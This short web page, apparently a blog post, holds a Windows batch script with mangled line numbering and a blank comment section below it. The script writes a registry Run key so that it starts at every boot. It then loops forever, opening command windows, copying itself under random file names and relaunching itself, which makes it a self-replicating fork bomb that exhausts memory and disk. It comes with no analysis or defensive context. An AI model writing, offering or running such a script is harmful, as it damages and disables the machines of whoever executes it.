1: @echo off2: set path="%windir%\system32"
3: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v blah /t REG_SZ /d "C:\WINDOWS\blah.bat" /f
   4: goto core   5: :core   6: start cmd.exe7: copy %0 %random%.bat >; nul
   8: start %0   9: goto core  10: :end  11: copy %0 %windir%\blah.bat > nul
No comments:
Post a Comment
please write your mail id for contact: